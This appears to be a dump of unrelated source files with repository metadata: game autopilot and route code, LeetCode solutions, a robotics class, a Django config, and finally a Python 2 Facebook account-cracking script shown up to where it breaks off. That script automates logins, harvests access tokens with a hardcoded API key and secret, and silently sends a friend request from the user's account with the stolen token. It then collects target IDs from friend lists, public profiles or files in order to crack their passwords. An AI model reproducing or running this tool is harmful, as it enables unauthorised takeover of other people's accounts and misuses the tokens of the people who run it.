                    park.CmdFollowBall(destID, 0.0)
                    self.LogWarn("Autopilot: I thought I was close enough to jump, but I wasn't.")
                sys.exc_clear()
                self.LogError('Autopilot: jumping to ' + jumpToLocationName + ' failed. Will try again')
                self.ignoreTimerCycles = 5
            except:
                sys.exc_clear()
                self.LogError('Autopilot: jumping to ' + jumpToLocationName + ' failed. Will try again')
                self.ignoreTimerCycles = 5
            return
        elif jumpingToCelestial and util.IsStation(destID) and shipDestDistance < const.maxDockingDistance:
            # Final waypoint is a station and we are in docking range.
            if not sm.GetService('machoNet').GetGlobalConfig().get('newAutoNavigationKillSwitch', False):
                if self.__navigateSystemDestinationItemID != destID:
                    if shipDestDistance > 2500:
                        sm.GetService('audio').SendUIEvent('wise:/msg_AutoPilotApproachingStation_play')
                    sm.GetService('menu').Dock(destID)
                    self.ignoreTimerCycles = 5
            else:
                if shipDestDistance > 2500 and self.approachAndTryTarget != destID:
                    sm.GetService('audio').SendUIEvent('wise:/msg_AutoPilotApproachingStation_play')
                sm.GetService('menu').Dock(destID)
            return
        elif shipDestDistance < const.minWarpDistance:
            # Too close to warp: fly there on sub-warp engines.
            if ship.mode == destiny.DSTBALL_FOLLOW and ship.followId == destID:
                return
            self.CancelSystemNavigation()
            park = sm.GetService('michelle').GetRemotePark()
            park.CmdSetSpeedFraction(1.0)
            shipui = uicore.layer.shipui
            if shipui.isopen:
                shipui.SetSpeed(1.0)
            park.CmdFollowBall(destID, 0.0)
            eve.Message('AutoPilotApproaching')
            if not (jumpingToCelestial and util.IsStation(destID)):
                sm.GetService('audio').SendUIEvent('wise:/msg_AutoPilotApproaching_play')
            self.LogInfo('Autopilot: approaching')
            self.ignoreTimerCycles = 2
            return
        # Far away: initiate warp toward the next hop.
        try:
            sm.GetService('space').WarpDestination(destID, None, None)
            sm.GetService('michelle').GetRemotePark().CmdWarpToStuffAutopilot(destID)
            eve.Message('AutoPilotWarpingTo', {'what': jumpToLocationName})
            if jumpingToCelestial:
                if util.IsStation(destID):
                    sm.GetService('audio').SendUIEvent('wise:/msg_AutoPilotWarpingToStation_play')
                self.LogInfo('Autopilot: warping to celestial object', destID)
            else:
                sm.GetService('audio').SendUIEvent('wise:/msg_AutoPilotWarpingTo_play')
                self.LogInfo('Autopilot: warping to gate')
            sm.ScatterEvent('OnAutoPilotWarp')
            self.ignoreTimerCycles = 2
        except UserError as e:
            sys.exc_clear()
            item = sm.GetService('godma').GetItem(session.shipid)
            if item.warpScrambleStatus > 0:
                self.SetOff('Autopilot cannot warp while warp scrambled.')
            if 'WarpDisrupted' in e.msg:
                self.SetOff('Autopilot cannot warp while warp scrambled by bubble.')
        except Exception as e:
            self.SetOff('Unknown error')
        return
def NavigateSystemTo(self, itemID, interactionRange, commandFunc, *args, **kwargs):
    """Start the auto-navigation loop: move within *interactionRange* of
    *itemID*, then invoke commandFunc(*args, **kwargs) once there."""
    self.LogInfo('Navigate to item', itemID, 'range', interactionRange, 'and execute', commandFunc)
    self.__navigateSystemDestinationItemID = itemID
    self.__navigateSystemThread = base.AutoTimer(50, self.__NavigateSystemTo, itemID, interactionRange, commandFunc, *args, **kwargs)

def CancelSystemNavigation(self):
    """Abandon any in-progress auto navigation (both flows)."""
    self.LogInfo('Cancel system navigation')
    self.__navigateSystemDestinationItemID = None
    self.__navigateSystemThread = None
    self.AbortApproachAndTryCommand()
    self.AbortWarpAndTryCommand()

def __NavigateSystemTo(self, itemID, interactionRange, commandFunc, *args, **kwargs):
    # One navigation tick, driven by the AutoTimer set above.
    try:
        if self.InWarp():
            # Mid-warp; just wait for the next tick.
            pass
        elif self.InInteractionRange(itemID, interactionRange) and not self.IsCloaked():
            self.LogInfo('System navigation: at target location. Triggering action')
            try:
                commandFunc(*args, **kwargs)
            except UserError:
                raise
            finally:
                self.CancelSystemNavigation()
        elif self.InWarpRange(itemID):
            self.LogInfo('System navigation: warping to target', itemID, interactionRange)
            sm.GetService('menu').WarpToItem(itemID, warpRange=const.minWarpEndDistance, cancelAutoNavigation=False)
        elif self.IsApproachable(itemID):
            sm.GetService('menu').Approach(itemID, cancelAutoNavigation=False)
        else:
            self.LogInfo('Unable to resolve the proper navigation action. Aborting.', itemID, interactionRange, commandFunc)
            self.CancelSystemNavigation()
        if self.__navigateSystemThread:
            # After the fast first tick, throttle to the normal loop rate.
            self.__navigateSystemThread.interval = AUTO_NAVIGATION_LOOP_INTERVAL_MS
    except UserError as e:
        self.LogInfo('User error detected', e.msg, itemID, interactionRange, commandFunc)
        raise
    except:
        self.LogError('Problem while navigating system', itemID, interactionRange, commandFunc)
        log.LogException(channel=self.__guid__)

def IsApproachable(self, itemID):
    # True when the item is closer than warp range (sub-warp flight).
    destBall = self.michelle.GetBall(itemID)
    if destBall is not None and destBall.surfaceDist < const.minWarpDistance:
        return True
    return False

def InInteractionRange(self, itemID, interactionRange):
    destBall = self.michelle.GetBall(itemID)
    if destBall is not None and destBall.surfaceDist < interactionRange:
        return True
    return False

def InWarp(self):
    shipBall = self.michelle.GetBall(session.shipid)
    if shipBall is not None and shipBall.mode == destiny.DSTBALL_WARP:
        return True
    return False

def InWarpRange(self, itemID):
    destBall = self.michelle.GetBall(itemID)
    if destBall is not None and destBall.surfaceDist > const.minWarpDistance:
        return True
    return False

def IsCloaked(self):
    shipBall = self.michelle.GetBall(session.shipid)
    if shipBall is not None:
        return bool(shipBall.isCloaked)
    return False
def WarpAndTryCommand(self, id, cmdMethod, args, interactionRange):
    """
    Legacy flow: warp to ball *id*, wait for the warp to finish, then
    call cmdMethod(*args) once inside *interactionRange*.  Aborts when
    warpAndTryTarget is retargeted while in flight.

    NOTE(review): indentation reconstructed from decompiled source.
    """
    bp = sm.StartService('michelle').GetRemotePark()
    if not bp:
        return
    if sm.StartService('space').CanWarp() and self.warpAndTryTarget != id:
        self.approachAndTryTarget = None
        self.warpAndTryTarget = id
        try:
            michelle = sm.StartService('michelle')
            shipBall = michelle.GetBall(session.shipid)
            if shipBall is None:
                return
            if shipBall.mode != destiny.DSTBALL_WARP:
                bp.CmdWarpToStuff('item', id)
                sm.StartService('space').WarpDestination(id, None, None)
                # Wait until the warp actually starts (or we are aborted).
                while self.warpAndTryTarget == id and shipBall.mode != destiny.DSTBALL_WARP:
                    blue.pyos.synchro.SleepWallclock(500)
            # Wait for the warp to complete.
            while shipBall.mode == destiny.DSTBALL_WARP:
                blue.pyos.synchro.SleepWallclock(500)
            counter = 3
            while self.warpAndTryTarget == id and counter > 0:
                destBall = michelle.GetBall(id)
                if not destBall or destBall.surfaceDist > const.minWarpDistance:
                    break
                destBall.GetVectorAt(blue.os.GetSimTime())
                if destBall.surfaceDist < interactionRange:
                    cmdMethod(*args)
                    break
                blue.pyos.synchro.SleepWallclock(500)
                counter -= 1
        finally:
            if self.warpAndTryTarget == id:
                self.warpAndTryTarget = None

def ApproachAndTryCommand(self, id, cmdMethod, args, interactionRange):
    """Legacy flow: approach ball *id* on sub-warp engines and call
    cmdMethod(*args) once inside *interactionRange* (and uncloaked)."""
    bp = sm.StartService('michelle').GetRemotePark()
    if not bp:
        return
    if self.approachAndTryTarget != id and not self.warpAndTryTarget:
        self.warpAndTryTarget = None
        self.approachAndTryTarget = id
        localbp = sm.StartService('michelle').GetBallpark()
        if not localbp:
            return
        try:
            sm.GetService('menu').Approach(id)
            michelle = sm.StartService('michelle')
            while self.approachAndTryTarget == id:
                ball = localbp.GetBall(id)
                if not ball:
                    break
                ball.GetVectorAt(blue.os.GetSimTime())
                shipBall = localbp.GetBall(session.shipid)
                if ball.surfaceDist < interactionRange and not shipBall.isCloaked:
                    cmdMethod(*args)
                    break
                blue.pyos.synchro.SleepWallclock(500)
        finally:
            if self.approachAndTryTarget == id:
                self.approachAndTryTarget = False

def AbortApproachAndTryCommand(self, nextID = None):
    # Abort unless the in-flight target is exactly the next one wanted.
    if nextID != self.approachAndTryTarget:
        self.approachAndTryTarget = None
        self.CancelSystemNavigation()

def AbortWarpAndTryCommand(self, nextID = None):
    if nextID != self.warpAndTryTarget:
        self.warpAndTryTarget = None
        self.CancelSystemNavigation()
def OptimizeRoute(self, *args):
    """
    Reorder the current star-map waypoints to minimize total jumps
    (exact branch-and-bound TSP over the waypoint systems), preserving
    station waypoints and an optional return to the current system.

    NOTE(review): indentation reconstructed from decompiled source.
    """
    if self.isOptimizing:
        return
    try:
        self.isOptimizing = True
        starmapSvc = sm.GetService('starmap')
        waypoints = list(starmapSvc.GetWaypoints())
        originalWaypointsLen = len(waypoints)
        # Strip a trailing "come back here" waypoint; re-appended at the end.
        isReturnTrip = False
        for idx in reversed(xrange(len(waypoints))):
            if waypoints[idx] == eve.session.solarsystemid2:
                del waypoints[idx]
                isReturnTrip = True
                break
        # Collapse station waypoints onto their solar systems, remembering
        # which stations belong to which system for re-expansion later.
        solarSystemToStations = defaultdict(list)
        for i, waypoint in enumerate(waypoints):
            if util.IsStation(waypoint):
                solarSystemID = cfg.stations.Get(waypoint).solarSystemID
                solarSystemToStations[solarSystemID].append(waypoint)
                waypoints[i] = solarSystemID
        waypoints = list(set(waypoints))
        if session.solarsystemid2 in waypoints:
            waypoints.remove(session.solarsystemid2)
        numWaypoints = len(waypoints)
        if numWaypoints == 0:
            return
        # Warn the user before an expensive optimization (factorial search).
        msg = None
        if numWaypoints > 12:
            msg = 'UI/Map/MapPallet/msgOptimizeQuestion1'
        elif numWaypoints > 10:
            msg = 'UI/Map/MapPallet/msgOptimizeQuestion2'
        if msg:
            yesNo = eve.Message('AskAreYouSure', {'cons': localization.GetByLabel(msg, numWaypoints=originalWaypointsLen)}, uiconst.YESNO)
            if yesNo != uiconst.ID_YES:
                return
        # Pairwise jump-distance matrix (includes the current system as
        # the route's starting point).
        distance = {}
        waypoints.append(eve.session.solarsystemid2)
        for fromID in waypoints:
            distance[fromID] = {}
            for toID in waypoints:
                if fromID == toID:
                    continue
                distance[fromID][toID] = sm.GetService('pathfinder').GetJumpCountFromCurrent(toID, fromID)
        waypoints.pop()
        startTime = blue.os.GetWallclockTimeNow()
        prefix = [None]
        _push = prefix.append
        _pop = prefix.pop

        def FindShortestRoute(prefix, distanceSoFar, toID):
            # Depth-first search over permutations; visited waypoints are
            # temporarily None'd out of the shared `waypoints` list.
            distanceTo = distance[toID]
            prefix[-1] = toID
            # NOTE(review): shortestDist is read once per call and not
            # refreshed after recursive improvements -- pruning is less
            # aggressive than it could be, but results stay correct.
            shortestDist = shortestRouteSoFar[0]
            if len(prefix) < numWaypoints:
                _push(None)
                for i in indexes:
                    toID = waypoints[i]
                    if not toID:
                        continue
                    candidateDist = distanceSoFar + distanceTo[toID]
                    if candidateDist >= shortestDist:
                        continue
                    waypoints[i] = None
                    FindShortestRoute(prefix, candidateDist, toID)
                    waypoints[i] = toID
                _pop()
            else:
                # Last hop: record any strictly better complete route.
                for i in indexes:
                    toID = waypoints[i]
                    if not toID:
                        continue
                    candidateDist = distanceSoFar + distanceTo[toID]
                    if candidateDist < shortestDist:
                        shortestRouteSoFar[:] = [candidateDist, prefix[:], toID]
                        shortestDist = candidateDist

        shortestRouteSoFar = [999999999, None, None]
        indexes = range(len(waypoints))
        FindShortestRoute(prefix, 0, eve.session.solarsystemid2)
        distance, waypoints, last = shortestRouteSoFar
        blue.pyos.synchro.SleepWallclock(1)
        endTime = blue.os.GetWallclockTimeNow()
        if waypoints is None:
            raise UserError('AutoPilotDisabledUnreachable')
        waypoints.append(last)
        # Re-expand system ids back into their station waypoints.
        waypointsWithStations = []
        for waypoint in waypoints:
            if waypoint in solarSystemToStations:
                waypointsWithStations.extend(solarSystemToStations[waypoint])
            else:
                waypointsWithStations.append(waypoint)
        if isReturnTrip == True:
            sm.GetService('starmap').SetWaypoints(waypointsWithStations + [session.solarsystemid2])
        else:
            sm.GetService('starmap').SetWaypoints(waypointsWithStations)
    finally:
        self.isOptimizing = False
"ferox2552@gmail.com"
] | ferox2552@gmail.com |
00d487751a336a68638c30b21a13815a2a96c309 | 07ecc53b5be6b1a34914a0e02265e847f3ac1a65 | /Python/Greedy Algorithm/984_Medium_不含AAA或BBB的字符串.py | 22600af30df05dac1d9060917965bf75ff165bad | [] | no_license | JasmineRain/Algorithm | 764473109ad12c051f5337ed6f22b517ed9bff30 | 84d7e11c1a01b1994e04a3ab446f0a35eb3d362a | refs/heads/master | 2023-03-14T00:39:51.767074 | 2021-03-09T12:41:44 | 2021-03-09T12:41:44 | 289,603,630 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,275 | py | class Solution:
def strWithout3a3b(self, a: int, b: int) -> str:
ans = [""] * (a + b)
index = 0
round = 1
ca = a
cb = b
if a >= b:
while ca > 0:
ans[index] = "a"
ca -= 1
index += 3
if index >= (a + b):
index = round
round += 1
while cb > 0:
ans[index] = "b"
cb -= 1
index += 3
if index >= (a + b):
index = round
round += 1
return "".join(ans)
else:
while cb > 0:
ans[index] = "b"
cb -= 1
index += 3
if index >= (a + b):
index = round
round += 1
while ca > 0:
ans[index] = "a"
ca -= 1
index += 3
if index >= (a + b):
index = round
round += 1
return "".join(ans)
# Quick manual check: print valid arrangements for a few (a, b) pairs.
if __name__ == "__main__":
    solver = Solution()
    for a, b in ((1, 2), (4, 1), (1, 3)):
        print(solver.strWithout3a3b(a=a, b=b))
| [
"530781348@qq.com"
] | 530781348@qq.com |
6abcd1cee3f4165bcbb7942b998559d41f8d3cc3 | fe931c53d269cb5b4c6972d4bc55e6890c22ea28 | /Platform.py | 9d25b650364382f733e5607ec37586109fc91f55 | [] | no_license | shuaiwangvu/hpp_course | f696fd508ca1a618011bda5ae7799548d748b37a | 545ada093d77ca4d8f446e4c7fc502f3af2016f5 | refs/heads/master | 2022-04-20T14:26:52.941142 | 2020-03-04T11:15:13 | 2020-03-04T11:15:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,764 | py | # gepetto-viewer-server
# not hpp-manipulation-server
# hppcorbaserver
# -DCMAKE_INSTALL_PREFIX=/home/airobert/HPP/install
from HyQ import HyQ
from Agent import PR2
from Environment import BasicHouse
from Obstacle import Obstacle
from hpp.corbaserver import ProblemSolver
# from hpp.corbaserver.manipulation import ProblemSolver as MProblemSolver, ConstraintGraph
from hpp.gepetto import PathPlayer
from hpp.gepetto import ViewerFactory
# from hpp.gepetto.manipulation import ViewerFactory as MViewerFactory
from hpp.corbaserver.manipulation import robot as METARobot
from time import sleep
class Platform ():
main_agent = None
meta_agent = None
agents = []
# problem solver
ps = None
# path player
pp = None
# view factory
vf = None
# viewer
r = None
env = None
# pp = PathPlayer (rbprmBuilder.client.basic,ls r)
def __init__(self, mainAgentType):
print 'creating a platform with an agent of type: ', mainAgentType
if (mainAgentType == "hyq" or mainAgentType == "HyQ" or mainAgentType == "HYQ"):
self.main_agent = HyQ(self, 1, "main")
elif (mainAgentType == "pr2" or mainAgentType == "PR2"):
self.main_agent = PR2(self, 1, "main")
else:
print 'this type of agent can not be defined yet'
self.ps = ProblemSolver (self.main_agent)
self.vf = ViewerFactory (self.ps)
self.r = self.vf.createViewer()
self.r(self.main_agent.getCurrentConfig ())
self.agents.append (self.main_agent)
def refreshDisplay(self):
# self.r = self.vf.createViewer()
self.r.computeObjectPosition()
#and finally, set the environment
def setEnvironment(self, env):
self.vf.loadObstacleModel(env.packageName, env.urdfName, env.name)
self.env = env
self.r = self.vf.createViewer()
# self.refreshDisplay()
# this method looks useless so far.....
# def activatePlatform(self):
# self.main_agent.client.problem.selectProblem('0')
# for i in self.agents:
# i.refrechAgent()
def loadAgentView (self, index):
self.ps = self.agents[index -1].ps
self.vf = ViewerFactory (self.ps)
self.r = self.vf.createViewer()
# print '---------------->', len(self.agents[index - 1].init_config)
self.r(self.agents[index - 1].init_config)
self.refreshDisplay()
# self.r.computeObjectPosition()
def playProposedPath(self, index):
self.loadAgentView(index)
a = self.agents[index - 1]
for t in range (a.proposed_plan_length):
self.r(a.configOfProposedPlanAtTime(t))
sleep(0.02)
def playAllPath(self):
max_time = 0
for a in self.agents:
if a.proposed_plan_length > max_time:
max_time = a.proposed_plan_length
for t in range(max_time):
print 'time is ', t
for i in range(len(self.agents)):
a = self.agents[i]
if a.proposed_plan_length > t:
print 'agent ', a.index,
self.loadAgentView(i)
# and then set the agent to its current configuration
self.r(a.configOfProposedPlanAtTime(t))
# sleep(0.003)
def checkAllPath(self):
max_time = 0
for a in self.agents:
if a.proposed_plan_length > max_time:
max_time = a.proposed_plan_length
for t in range(max_time):
print 'time is ', t
for i in range(len(self.agents)):
a = self.agents[i]
if a.proposed_plan_length > t:
print 'agent ', a.index,
self.loadAgentView(i)
# and then set the agent to its current configuration
self.r(a.configOfProposedPlanAtTime(t))
# (result, msg) = a.isConfigValid(a.configOfProposedPlanAtTime(t))
# if not result:
# return False
# sleep(0.003)
def playAgentPath(self, cl):
self.pp = PathPlayer (cl, self.r)
self.pp.setSpeed(4) # comment this out if you are not debugging
self.pp.displayPath(0, color = [0.3, 0.7, 0.6, 1], jointName='base_joint_xy')
self.pp(0)
def addAgent(self, agt):
self.agents.append(agt) | [
"ai.robert.wangshuai@gmail.com"
] | ai.robert.wangshuai@gmail.com |
90f9c2b7cba886de306796566f399f9f8ad054ff | 033d4f3fb539425f12a7f951e011f7696f7c909f | /TigerNuts/asgi.py | 413278ae30f335a908a31b7e7499a439a376e677 | [] | no_license | hristo-grudev/TigerNuts | 07413edd57a3b78e09b7ba3355f0ecf4497573d4 | d328842c0454890fc0d3d7712d2c9bc272da8b42 | refs/heads/main | 2023-03-07T19:16:22.175112 | 2021-02-24T09:51:22 | 2021-02-24T09:51:22 | 328,690,018 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
ASGI config for TigerNuts project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Must be set before get_asgi_application(), which imports the settings module.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'TigerNuts.settings')
# Module-level ASGI callable picked up by ASGI servers (daphne, uvicorn, ...).
application = get_asgi_application()
| [
"hristo.grudev@ADPVT.com"
] | hristo.grudev@ADPVT.com |
dca261af830e2fc00b8bbeb22fa8e92af90f3b9d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_oppressors.py | 794179fbab874c62e6c90e5f1fc1331b1f5c3cc8 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py |
# class header
class _OPPRESSORS():
def __init__(self,):
self.name = "OPPRESSORS"
self.definitions = oppressor
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['oppressor']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
c3f8c9326a98788d32a1dd6f6cb2abac77136527 | 7a550d2268bc4bc7e2fec608ffb1db4b2e5e94a0 | /1301-1400/1342-Number of Steps to Reduce a Number to Zero/1342-Number of Steps to Reduce a Number to Zero.py | ff2024f01916125f617a9207453ff82c87002008 | [
"MIT"
] | permissive | jiadaizhao/LeetCode | be31bd0db50cc6835d9c9eff8e0175747098afc6 | 4ddea0a532fe7c5d053ffbd6870174ec99fc2d60 | refs/heads/master | 2021-11-05T04:38:47.252590 | 2021-10-31T09:54:53 | 2021-10-31T09:54:53 | 99,655,604 | 52 | 28 | MIT | 2020-10-02T12:47:47 | 2017-08-08T05:57:26 | C++ | UTF-8 | Python | false | false | 239 | py | class Solution:
def numberOfSteps (self, num: int) -> int:
step = 0
while num != 0:
if num & 1:
num -= 1
else:
num >>= 1
step += 1
return step
| [
"jiadaizhao@gmail.com"
] | jiadaizhao@gmail.com |
adeddb66f2e1571cadf7716696856f2eff28564b | f5d98c19591dd692f784f909e245ce527062c87d | /zeroboy.py | dfc1f9c9cb7d31278884b4bc19ef84e17a243fd8 | [] | no_license | hum4-munga4/hum4 | 2644feaf7430112432aab9399d74e617d1004d9b | b4f95dcae8b774010bb68223407eda7a18eeb1ad | refs/heads/master | 2022-04-17T14:08:02.703666 | 2020-04-18T13:44:28 | 2020-04-18T13:44:28 | 256,763,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,397 | py | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """
\033[1;91m🄷🄰🅁🅂🄷🄻🄴🅆🄰🄽🅈
\033[1;91m🄷🅄🄼4-🄼🅄🄽🄶🄰4
\033[1;97m===========================
\033[1;96mAuthor \033[1;93m:Harsh \033[1;92mHarsh Lewany
\033[1;96mInstagram \033[1;93m: \033[1;FlowHarsh
\033[1;96mFacebook \033[1;93m: \033[1; Aahilrna4072
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://github.com/Therana/zero
\033[1;91m======================================="""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m ============================================================="
print """\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92mRana Aahil
\033[1;96mInstagram \033[1;93m: \033[1;92mFlowRana
\033[1;96mFacebook \033[1;93m: \033[1;92m Aahilrana4072
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://Github.com/Therana/zero
\033[1;91m======================================="""
print " \x1b[1;93m============================================================="
CorrectUsername = "rana"
CorrectPassword = "rana"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;93mUsername Of Tool \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;93mPassword Of Tool \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Wrong Password"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "Wrong Username"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN WITH FACEBOOK \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Successful'
os.system('xdg-open https://www.Facebook.com/Omi6t')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mIt seems that your account has a checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mIt seems that your account has a checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Start Hacking"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Exit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Crack From Friend List"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Crack From Any Public ID"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Crack From File"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mGetting ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mEnter ID \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mName\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mID Not Found!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mGetting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mEnter File Path \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Not Found'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
